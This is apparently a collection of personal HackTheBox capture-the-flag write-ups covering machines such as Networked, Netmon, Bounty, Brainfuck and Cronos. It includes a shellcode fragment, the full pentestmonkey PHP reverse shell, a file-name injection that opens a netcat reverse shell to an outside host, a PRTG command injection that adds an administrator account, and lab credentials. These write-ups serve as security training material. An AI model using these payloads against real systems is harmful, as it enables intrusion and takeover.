b\u0026#34;\\xc7\\xc2\\x98\\xed\\xa8\\xb2\\x58\\x5e\\x41\\xd8\\x56\u0026#34; payload += b\u0026#34;\\x81\\x71\\xe3\\xbc\\xaa\\x18\\x1e\\x57\\xdf\\xd6\\x2e\u0026#34; payload += b\u0026#34;\\xb0\\xb7\\xe4\\x2e\\xbf\\xfc\\x60\\xc8\\xd5\\x12\\x25\u0026#34; payload += b\u0026#34;\\x43\\x42\\x8a\\x6c\\x1f\\xf3\\x53\\xbb\\x5a\\x33\\xdf\u0026#34; payload += b\u0026#34;\\x48\\x9b\\xfa\\x28\\x24\\x8f\\x6b\\xd9\\x73\\xed\\x3a\u0026#34; payload += b\u0026#34;\\xe6\\xa9\\x99\\xa1\\x75\\x36\\x59\\xaf\\x65\\xe1\\x0e\u0026#34; payload += b\u0026#34;\\xf8\\x58\\xf8\\xda\\x14\\xc2\\x52\\xf8\\xe4\\x92\\x9d\u0026#34; payload += b\u0026#34;\\xb8\\x32\\x67\\x23\\x41\\xb6\\xd3\\x07\\x51\\x0e\\xdb\u0026#34; payload += b\u0026#34;\\x03\\x05\\xde\\x8a\\xdd\\xf3\\x98\\x64\\xac\\xad\\x72\u0026#34; payload += b\u0026#34;\\xda\\x66\\x39\\x02\\x10\\xb9\\x3f\\x0b\\x7d\\x4f\\xdf\u0026#34; payload += b\u0026#34;\\xba\\x28\\x16\\xe0\\x73\\xbd\\x9e\\x99\\x69\\x5d\\x60\u0026#34; payload += b\u0026#34;\\x70\\x2a\\x6d\\x2b\\xd8\\x1b\\xe6\\xf2\\x89\\x19\\x6b\u0026#34; payload += b\u0026#34;\\x05\\x64\\x5d\\x92\\x86\\x8c\\x1e\\x61\\x96\\xe5\\x1b\u0026#34; payload += b\u0026#34;\\x2d\\x10\\x16\\x56\\x3e\\xf5\\x18\\xc5\\x3f\\xdc\u0026#34; this is the payload we r getting now lets update the script\naannnnd we have our admin shell on 443\nRoot flag\n","date":"3 September 2024","externalUrl":null,"permalink":"/ctf-writeups/buff/","section":"CTF Writeups","summary":"","title":"buff","type":"ctf-writeups"},{"content":" swagshop # Overview # OS: Linux IP: 10.10.10.140 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # to be continued.\nEnumeration # nmap results\nadding 10.10.10.140 swagshop.htb to our /etc/hosts folder we are able to access the site\ndirsearch\nRelease_notes.txt directory\nok so i thought this site would be useful for getting the version of magneto running, but no its redirecting us to another site to get the current release notes, which makes this useless.\nlets try using a tool called magescan instead to get the version\nfollow these commands\nsudo apt update sudo apt install php-cli -y wget https://github.com/steverobbins/magescan/releases/latest/download/magescan.phar chmod +x magescan.phar ./magescan.phar nice , our magento version is 1.9.0.0\noh wow we got some db credentials form the local xml directory we found from dirbusting.\nroot:fMVWh7bDHpgZkyfqQXreTjU9\ndbname:swagshop\nkey:b355a9e0cd018d3f7f03607141518419\nVulnerabilities # lets check out the remote code exec one\nshoplift\nExploitation # ok lets check out this and see if there any changes that have to be made to the script.\nlets see if we can access that link specified as the target url\nok so we cant access the page, lets try\non messing with the site\ni realized that any page that i visit has index.php being added at the start of the url , lets try adding that to the target url and see if we can access the page or not.\nand boom it works, lets change this in the script accordingly\nfirst remove these unnecessary characters\nok so once this script executes it will create a another acc with these credentials for us to login with.\nok now lets run it\nok wow it worked , lets try those credentials no w\nwe are getting this page??\noh nvm on pressing the back page button we are greeted with this\nwe are in the admin panel!\nremember we came across some magento exploit that required us to be authenticated?\nnow that we are authenticated, lets visit that\nlets get the exact date from the local xml file\ncomment the first few lines out and these lines to the script\nchange from 7d to 2y here as there were no orders in the past 2 years\nok we are ready to run the script now\nlets fix this error\nkept getting this error , got fustrated will attempt again\n","date":"29 August 2024","externalUrl":null,"permalink":"/ctf-writeups/swagshop/","section":"CTF Writeups","summary":"","title":"swagshop","type":"ctf-writeups"},{"content":" Networked # Overview # OS: Linux IP: 10.10.10.146 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt to upload a content type payload with the extension .png.\nEnumeration # nmap scan results\nhomepage\ndirsearch\n/backup\n/photos\n/upload\nVulnerabilities # Exploitation # ok so on examining upload.php apparently the validation is only done by extension\n//$name = $_SERVER[\u0026#39;REMOTE_ADDR\u0026#39;].\u0026#39;-\u0026#39;. $myFile[\u0026#34;name\u0026#34;]; list ($foo,$ext) = getnameUpload($myFile[\u0026#34;name\u0026#34;]); $validext = array(\u0026#39;.jpg\u0026#39;, \u0026#39;.png\u0026#39;, \u0026#39;.gif\u0026#39;, \u0026#39;.jpeg\u0026#39;); $valid = false; foreach ($validext as $vext) { if (substr_compare($myFile[\u0026#34;name\u0026#34;], $vext, -strlen($vext)) === 0) { $valid = true; } and permissions are being set on the uploaded files\n// set proper permissions on the new file chmod(UPLOAD_DIR . $name, 0644); lets try uploading a shell, first lets get the php reverse shell from pentestmonkey\n\u0026lt;?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool. // // In all other respects the GPL version 2 applies: // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License version 2 as // published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. If these terms are not acceptable to // you, then do not use this tool. // // You are encouraged to send comments, improvements or suggestions to // me at pentestmonkey@pentestmonkey.net // // Description // ----------- // This script will make an outbound TCP connection to a hardcoded IP and port. // The recipient will be given a shell running as the current user (apache normally). // // Limitations // ----------- // proc_open and stream_set_blocking require PHP version 4.3+, or 5+ // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows. // Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION = \u0026#34;1.0\u0026#34;; $ip = \u0026#39;127.0.0.1\u0026#39;; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = \u0026#39;uname -a; w; id; /bin/sh -i\u0026#39;; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists(\u0026#39;pcntl_fork\u0026#39;)) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit(\u0026#34;ERROR: Can\u0026#39;t fork\u0026#34;); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit(\u0026#34;Error: Can\u0026#39;t setsid()\u0026#34;); exit(1); } $daemon = 1; } else { printit(\u0026#34;WARNING: Failed to daemonise. This is quite common and not fatal.\u0026#34;); } // Change to a safe directory chdir(\u0026#34;/\u0026#34;); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit(\u0026#34;$errstr ($errno)\u0026#34;); exit(1); } // Spawn shell process $descriptorspec = array( 0 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;r\u0026#34;), // stdin is a pipe that the child will read from 1 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;), // stdout is a pipe that the child will write to 2 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;) // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit(\u0026#34;ERROR: Can\u0026#39;t spawn shell\u0026#34;); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won\u0026#39;t stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit(\u0026#34;Successfully opened reverse shell to $ip:$port\u0026#34;); while (1) { // Check for end of TCP connection if (feof($sock)) { printit(\u0026#34;ERROR: Shell connection terminated\u0026#34;); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit(\u0026#34;ERROR: Shell process terminated\u0026#34;); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process\u0026#39;s STDIN if (in_array($sock, $read_a)) { if ($debug) printit(\u0026#34;SOCK READ\u0026#34;); $input = fread($sock, $chunk_size); if ($debug) printit(\u0026#34;SOCK: $input\u0026#34;); fwrite($pipes[0], $input); } // If we can read from the process\u0026#39;s STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit(\u0026#34;STDOUT READ\u0026#34;); $input = fread($pipes[1], $chunk_size); if ($debug) printit(\u0026#34;STDOUT: $input\u0026#34;); fwrite($sock, $input); } // If we can read from the process\u0026#39;s STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit(\u0026#34;STDERR READ\u0026#34;); $input = fread($pipes[2], $chunk_size); if ($debug) printit(\u0026#34;STDERR: $input\u0026#34;); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we\u0026#39;ve daemonised ourself // (I can\u0026#39;t figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print \u0026#34;$string\\n\u0026#34;; } } ?\u0026gt; we will change the ip nd port accordingly\nand then we add this to the top line\nGIF89a;\nfollowed w renaming the file from .php to .php.png nd then we upload this file\nok cool now we have our shell\nlets upgrade the shell with some magic like how we do\npython -c ‘import pty;pty.spawn(”/bin/bash”)’\nstty -a ; for getting the col nd row signs\nctrl+z to put the process in foreground\nfollowed with\nstty raw-echo;fg nd hit the enter button twice\nset cols nd rows with info from stty-a\nalr now moving on we see that our user is apache\nok cool our privs our still low , lets escalate them nd pwn the box\nwe first start a python server on our machine where linpeas is located , then from the victims machine we use a curl command to grab the file\ncurl http://ip:port/linpeas.sh -o linpeas.sh\nand then we change the permission\nchmod + x linpeas.sh\nthen we run it with ./linpeas.sh\nok lets check out if there is anything interesting from the scan\naand there was nothing interersting at all because most of the permissions are restricted for the user we are on.\nlets search dirs manually nd see if we come across anything interesting\noh damn so there is a cron job being run with this user called guly\nlets check it out\nso every 3 minutes the check_attack.php file runs\nok so this basically executes any php file that is in the uploads dir, nd checks if it is a potential attack or not\nwhat if we put a rev shell here?\nlets do that\nnavigate to that dir nd type this\ntouch — ‘;nc -c bash 10.10.14.30 4321;.php’\nnow lets wait\naaand we have our connect\nlets try sudo -l\nok so we have permissions to this file called changename.sh ?\nlets check it out\nThe regex here allow us to use normal characters and another symbols like /, \\ -, _ ,and space\nlets try /bin/bash\nand there we go , root access now time to grab the flags\nuser flag\nroot flag\n","date":"24 August 2024","externalUrl":null,"permalink":"/ctf-writeups/networked/","section":"CTF Writeups","summary":"","title":"Networked","type":"ctf-writeups"},{"content":" Sunday # Overview # OS: Solaris IP: 10.10.10.76 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # pwned box sunday, learnt to do username enumeration for finger service nd crack hash with john.\nEnumeration # ok so finger seems to be running, lets start with enumerating for users\nwe will use this pentest monkey script for the enumeration\nhttps://pentestmonkey.net/tools/user-enumeration/finger-user-enum\nwe got sammy and sunny as the users after doing some user enum\nExploitation # lets now use these creds to access ssh\nguessing the box name sunday as the password works\nnavigating to /backup we find two hashes , lets break them with john\nwe will use this to identify the hash\nhttps://hashes.com/en/tools/hash_identifier\nand we got the pass as cooldude!\nand we are done , we have our root shell\nuser flag\nroot flag\n","date":"24 August 2024","externalUrl":null,"permalink":"/ctf-writeups/sunday/","section":"CTF Writeups","summary":"","title":"Sunday","type":"ctf-writeups"},{"content":" Valentine # Overview # OS: Linux IP: 10.10.10.79 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # tmux session + heartbleed exploit.\nEnumeration # nmap scan result\ndirbuster result\ngoing to dev we get these files\nand this hype key\nhomepage\nencoder\ndecoder\nnmap vuln scan\nVulnerabilities # I validated this step using the evidence below before moving forward in the chain.\nwe will be using the heartbleed exploit, the omg.jpg we found earlier seemed to have been hinting at this exploit also\nExploitation # This page has the code in hexa , lets convert it to plaintext for us to read using this\nhttps://www.rapidtables.com/convert/number/hex-to-ascii.html\nnice, it turned out to be a RSA private key\nlets get the heartbleed script from here\ngit clone https://gist.github.com/10174134.git\nnow lets run it\nsomeone had tried to encode this text , lets decode it with the tool they have on their site\nnice now lets try this as our ssh pass for users valentine,heart,hype,etc\naaand we are in\nnow we will probably have to escalate our privileges\nafter using a simple python server paired with wget to get linpeas running on our victims system\nwe are able to identify that tmux is running , thats great we can use this to elevate our priv\ntmux -S /.devs/dev_sess\ntyping this connects us to the session and we can now grab our flags\nroot flag\nuser flag\n","date":"24 August 2024","externalUrl":null,"permalink":"/ctf-writeups/valentine/","section":"CTF Writeups","summary":"","title":"Valentine","type":"ctf-writeups"},{"content":" Blocky # Overview # OS: Linux IP: 10.10.10.37 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # set up JD GUI for decompiling java code , checked the .class object got credentials nd then got access with sudo -l , priv esc was easy it was just sudo -l followed with sudo su.\nEnumeration # nmap scan results\nlets add blocky.htb to our /etc/hosts file so we can view the homepage\ndirbusting results\nphpMyadmin login page\nwordpress login\n/plugins/\nok interesting we have 2 jar files with us\nwe have this file with us on going thru the rar file , lets view it using JD GUI\nhttp://java-decompiler.github.io/ we get our .rpm file from here\nnow\nconverting to debian file with alien command\n└─$ sudo alien jd-gui*.rpm\nfollowed by this for installing\nsudo dpkg -i jd-gui*.deb\nand now we can view our class file\nalright so these our creds , we will use these in the exploitation stage\n8YsqfCTnvxAUeduzjNSXe22\nExploitation # ok so htb had also asked us a question in the first step which was what the username is through enumeration? the only user we were able to find were root and a guy called notch.\nlets try using these creds with ssh\nalright great we got in with notch but root failed\nlets check notchs perimissions\nwow we can run all commands , lets upgrad to root shell nd grab our flags\nroot flag\nuser flag\n","date":"23 August 2024","externalUrl":null,"permalink":"/ctf-writeups/blocky/","section":"CTF Writeups","summary":"","title":"Blocky","type":"ctf-writeups"},{"content":" Netmon # Overview # OS: Windows IP: 10.10.10.152 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # normal access through rci exploit nd config file investigation.\nEnumeration # nmap scan results\nalright so ftp seems to be running and that too with anon access , lets check this out later\nhomepage\nwe tried these default creds , but they did not seem to work\ndirbusting\ndirsearch -u http://10.10.10.152/ -e php,txt,html -x 403,404 -t 50\nnothing useful that we can access\nVulnerabilities # ftp with anon access\nExploitation # Accessing the ftp server anonymously\nUser Flag\nplease ignore the failed attempts with cat and type i forgot that get should be used here\nwe know that by default the file path for the config files for this service would be this\non visiting this location we come across these files\nwe were getting an error earlier while trying to retrieve the file with the get command but we resolve this by changing the mode to binary and then trying it out, we just have to type binary once per ftp session to change the download mode from ascii to binary apparently.\nanyways lets scan through the contents of the file\nand there we go , in the first few lines we find the admin user nd pass\nlets use this to authenticate\nprtgadmin:PrTg@dmin2018\nok soon trying these creds we did not get access but if we look at the config files again\nwe see that damn there was another update that happened in the year after , so lets try changing the 2018 to 2019\nannnd we are in , now lets check for any vulnerabilities for this version of prtg network monitor.\nhttps://codewatch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/\nwe find this blogpost that tells us that we can execute commands through the notification parameter as they are directly sent to the powershell without any sanitization.\nwe go to\nSetup \u0026gt; Account Settings \u0026gt; Notifications. And click “+” sign to the right side.\nLeaving all the options as it is, go to “Execute Program” and here we can inject commands in the “Parameter” field. This is my payload\nlets use this payload\ntest.txt;net user anon p3nT3st! /add;net localgroup administrators anon /add\nwhich i got from this blog\nhttps://medium.com/@preethambomma/netmon-hackthebox-writeup-fe6e9f1ff5b0\nlets get psexec from here\nhttps://github.com/fortra/impacket/blob/master/examples/psexec.py\nnow lets use this to authenticate\nunfortunately i kept getting this error but it is supposed to have worked, anyways i am going to try a different method\nlets use this cve exploit\nhttps://github.com/A1vinSmith/CVE-2018-9276\nand we are finally in\nRoot Flag\n","date":"20 August 2024","externalUrl":null,"permalink":"/ctf-writeups/netmon/","section":"CTF Writeups","summary":"","title":"Netmon","type":"ctf-writeups"},{"content":" Arctic # Overview # OS: Windows IP: 10.10.10.11 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # used a local exploit , certutil and hashcat done w/o ms.\nEnumeration # nmap scan results\nhomepage\nwe find the admin page\nVulnerabilities # ok so they are using CFIDE . lets look up a exploit for this\nhttps://www.exploit-db.com/exploits/50057\nDirectory traversal exploit\nhttps://www.exploit-db.com/exploits/14641\nExploitation # without metasploit lets use the 2010 directory traversal exploit\nlets visit the directory specified\nok so with this we have the password but its encrypted using a hash value ,\nlets identify the hash first\nhmm alright , lets use hashcat now\nand there we go , we got the password , now lets access the admin page\nwe find this scheduled task page , where we can possibly upload our payload\nlets create a jsp payload with msfvenom and upload it\nstarting a simple server\nnow lets grab our file\non visiting index we find this\nand there we go we got our shell . now time for some privilege escalation soon\nthis is our systems information\nHost Name: ARCTIC OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization:\nProduct ID: 55041-507-9857321-84451 Original Install Date: 22/3/2017, 11:09:45 �� System Boot Time: 6/8/2024, 6:24:51 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\\Windows System Directory: C:\\Windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 6.143 MB Available Physical Memory: 5.097 MB Virtual Memory: Max Size: 12.285 MB Virtual Memory: Available: 11.288 MB Virtual Memory: In Use: 997 MB Page File Location(s): C:\\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s):\n1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.11\nlets put this in a local windows exploit suggester\nlets use ms10-059\nwe will upload this with simple serv nd execute on the targets machine\nlets execute it now\nok lts get out upgraded shell now\nand now e can grab our flags\nroot flag\nuser flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/arctic/","section":"CTF Writeups","summary":"","title":"Arctic","type":"ctf-writeups"},{"content":" Bastard # Overview # OS: Windows IP: 10.10.10.9 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # Exploited site made using drupal , used a exploit that allowed remote code exec , got in and then did priv esc with ms10-59 chimchurri exploit.\nEnumeration # nmap scan results\nhomepage\nChangelog.txt which is a default drupal file\nfor some reason dirbuster and gobuster both seem to be acting up with this box , lets try dir search as a final resort\nVulnerabilities # So for Drupal 7.54 we have the following vulns available\nwe could go with drupalgeddon2 but it was released in 13th april 2018 , which is much later than the box’s release date 18 March,2017.\nso lets try looking for a exploit before or nearer to that date\nhad to search just Drupal this time for a wider list\nthis is probably the intended exploit so lets use this\n2017-03-09\nExploitation # lets make the following changes to the exploit\nnote: make sure to do sudo apt install php-curl before running the script\nthats strange , oh i forgot to change the rest endpoint as well , gobuster gave us the /rest dir earlier and on visiting it we seem to have activated the endpoint.\nlets modify the script now\nwe got our file muq.php uploaded , now lets try for a rev shell\nnow time to run the nc\nand we are in\nso systeminfo gives us this\nHost Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization:\nProduct ID: 55041-402-3582622-84461 Original Install Date: 18/3/2017, 7:04:46 �� System Boot Time: 11/8/2024, 6:06:34 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\\Windows System Directory: C:\\Windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.047 MB Available Physical Memory: 1.594 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.621 MB Virtual Memory: In Use: 474 MB Page File Location(s): C:\\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.9\nlets use this with our windows exploit suggester and see if we find something sweet\nlets try using this exploit\nwe will get this on our machine with a python serv nd use it to get us a rev shell\nand now we grab our flags\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/bastard/","section":"CTF Writeups","summary":"","title":"Bastard","type":"ctf-writeups"},{"content":" Bounty # Overview # OS: Windows IP: 10.10.10.93 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # modified web.config file that allows the upload of aspx files to upload a aspx reverse shell payload but shell is not stable.\nEnumeration # nmap scan\nhomepage\ndirbusting results\ntransfer.aspx\nVulnerabilities # transfer.aspx directory\nasp through webconfig https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/\nExploitation # lets see what all extensions we can upload to the server\nfirst lets send the upload action to a repeater\nnow lets create our payload\nlet this be our extensions.txt file\nwe send the request to the intruder and then add our payload\nhere we define the payload\nok so with this we can tell that the server accepts uploads with these extensions\nhttps://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/\nthis config file allows us to upload asp files which could give us a shell so lets use this\n\u0026lt;?xml version=\u0026quot;1.0\u0026quot; encoding=\u0026quot;UTF-8\u0026quot;?\u0026gt;\n\u0026lt;configuration\u0026gt;\n\u0026lt;system.webServer\u0026gt;\n\u0026lt;handlers accessPolicy=\u0026quot;Read, Script, Write\u0026quot;\u0026gt;\n\u0026lt;add name=\u0026quot;web_config\u0026quot; path=\u0026quot;*.config\u0026quot; verb=\u0026quot;*\u0026quot; modules=\u0026quot;IsapiModule\u0026quot; scriptProcessor=\u0026quot;%windir%\\system32\\inetsrv\\asp.dll\u0026quot; resourceType=\u0026quot;Unspecified\u0026quot; requireAccess=\u0026quot;Write\u0026quot; preCondition=\u0026quot;bitness64\u0026quot; /\u0026gt;\n\u0026lt;/handlers\u0026gt;\n\u0026lt;security\u0026gt;\n\u0026lt;requestFiltering\u0026gt;\n\u0026lt;fileExtensions\u0026gt;\n\u0026lt;remove fileExtension=\u0026quot;.config\u0026quot; /\u0026gt;\n\u0026lt;/fileExtensions\u0026gt;\n\u0026lt;hiddenSegments\u0026gt;\n\u0026lt;remove segment=\u0026quot;web.config\u0026quot; /\u0026gt;\n\u0026lt;/hiddenSegments\u0026gt;\n\u0026lt;/requestFiltering\u0026gt;\n\u0026lt;/security\u0026gt;\n\u0026lt;/system.webServer\u0026gt;\n\u0026lt;/configuration\u0026gt;\n\u0026lt;!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!\n\u0026lt;%\nResponse.write(\u0026quot;-\u0026quot;\u0026amp;\u0026quot;-\u0026gt;\u0026quot;)\n' it is running the ASP code if you can see 3 by opening the web.config file!\nResponse.write(1+2)\nResponse.write(\u0026quot;\u0026lt;!-\u0026quot;\u0026amp;\u0026quot;-\u0026quot;)\n%\u0026gt;\n-\u0026gt; now lets upload this file on the server\nits displaying 3 , that means our web.config file is working properly\nnow we can go ahead and try getting a shell\nalright we have made our payload , now time to get it running on the victims box\nsetting up our python server nd netcat\nwe will now use certutil to get the exe payload\nand on uploading then refreshing the uploadedfiles/webconfig dir\nwe have our shell\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/bounty/","section":"CTF Writeups","summary":"","title":"Bounty","type":"ctf-writeups"},{"content":" Brainfuck # Overview # OS: Linux IP: 10.10.10.17 Difficulty: Insane Platform: HackTheBox OSCP: No Lists: N/A Summary # wpscan, vignere, cipher, ssh2john, evoution ,linpeas.\nEnumeration # nmap scan results\nhomepage\ninspecting the certificate\nwww.brainfuck.htb\nsup3rs3cr3t.brainfuck.htb\nadding these to our /etc/hosts file\nsup3rs3cr3t.brainfuck.htb\nwww.brainfuck.htb\nwpscan enumeration for word-press sites\nlets get a list of vulnerabilities as well by giving the apikey using the api switch —api-token [apikey]\non checking dev-update poste we find the username as admin\nlets use the wpscan to enumerate the users as well , using the enumerate-user flag\nVulnerabilities # lets check this one out\nExploitation # modifying the script with the credentials we got from our enumeration stage\nlets now save it as an html file\nhosting it with python\nlets visit our local host now\nnow we should be logging in , on revisiting the site [ what we just did was , we used a cookie that tells the browser that we are a logged in user and using that we were able to login as anyone including admin.\nthe site seems to be hinting at smtp , so lets check that out\ndashboard\nok so we have the password being shown here for the user orestis , but its not really visible , lets see if we can do something about it with inspecting\norestis:kHGuERB29DNiNE —\u0026gt; our smtp creds\nok now that we have the creds , let use Evolution\nnow after we are done with this , we go back to the homepage to be greeted with a authentication request.\nlets use the password we got earlier\non inspecting the mail we find these credentials\nlets use theses details for the supersecretforum page we found earlier during enumeration.\norestis:kIEnnfEKJ#9UmdO\nok so this tells us that the ssh access now only uses keys , and the key is apparently being shared in a secret forum.\nlets check that forum out\nalright, so the messages seem to be encrypted\nso straight off the bat we notice that\nseems to be a signature , and judging by the same word length , these might be the same sentences.\nlets try cracking the cipher with this\nso right off we can tell that this might be a vernam cipher , lets try using this website to decode the key\nwe get the key as fuck my brain\nnow lets decrypt the forum using this key we got\nok so we got the link for the key , lets visit it\nfor some reason i keep getting this 404 not found page\nlets try grabbing it with this instead\nwget \u0026ndash;no-check-certificate https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa\nalright so this seems to work now we check out the key\nwe have our RSA private key , but it is encrypted\nlets use ssh2john to put the RSA key in a crackable format\nnow lets give the crackthis file to john for decrypting\nusing john we got our key as 3poulakia!\nnow lets try logging in with ssh -i id_rsa orestis@brainfuck.htb\nlets try again but with changing the permissions before\nand we are in\nlets check the other files out as well\norestis@brainfuck:~$ cat output.txt Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182\nso the root.txt file seems to have been encrypted using this\nahh we need to some priv esc.\nlets use linpeas to perform a scan for some possible priv esc vectors\nwe first get linepeas.sh from https://github.com/peass-ng/PEASS-ng/releases/tag/20240811-aea595a1\nwe will now host it on a server using python for our box , as htb boxes dont usually have internet access\nlets use wget now\nwe have it now in our tmp folder , lets run it\nforgot to change our permissions first hah\nIn linpeas.sh, a RED/YELLOW box has a 95% chance at being a viable privesc vector.\nunder the exploit section we find a few to choose from\nlets go with this exploit\nwe got the exploit on our system\nlets unzip it\nand there we go , root access!\ngetting our root flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/brainfuck/","section":"CTF Writeups","summary":"","title":"Brainfuck","type":"ctf-writeups"},{"content":" Cronos # Overview # OS: Linux IP: 10.10.10.13 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt to perform dns enumeration , learnt how to use sql injection payloads , used lin peas to find a cron job running , ran a php rev shell through the cron job and pwned box CronOS.\nEnumeration # nmap results\nok so we can see that there is dns-nsid\nlets perform dns enum with ns lookup\ndns enum\nWe will now check for zone transfer using DIG command. DNS zone transfer, also known as DNS query type AXFR, is a process by which a DNS server passes a copy of part of its database to another DNS server. The portion of the database that is replicated is known as a zone.\nUSAGE- dig axfr @\u0026lt;DNS_IP\u0026gt; lets add these to our hosts file\ncronos and www.cronos\nns1.cronos.htb\nadmin.cronos.htb\ndirbusting\nconfig.php\nVulnerabilities # Exploitation # lets try getting past this login screen , we will try some sql payloads from a cheatsheet\nhttps://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/\nthis one gets us in , and we are greeted with this welcome.php page\nlets try terminating the command and following it up with a basic cmd\nok damn so it works , lets try getting a rev shell\nwe got our netcat up\nok so this does not work , uhh lets check the requests that we are sending with burpsuite and see if we can do anything there\nok so 2 things are happening\nthere is some hsot condition the code is being url encoded lets try removing all that while preserving the encoding\nthis does not work , lets try another variation of the netcat command\nthis works and we now have our shell\nand there ,we have our user flag grabbed right off the bat\ntime to do some privesc for getting root access\nwe go to the tmp folder nd use wget to get linpeas from the python serv we started\nnow lets run linpeas\noops i forgot to upgrade the shell , we will do that after this\nthere we upgraded the shell, now lets check the lin peas result\nok so pwnkit seems to be an exploit for this, i have used it before nd dont want to use it rn so lets look a bit more\nok so the orangish box tells us that this is 90% a priv esc vector , and it probably is because its a cron job being run with usr priv to create a file w 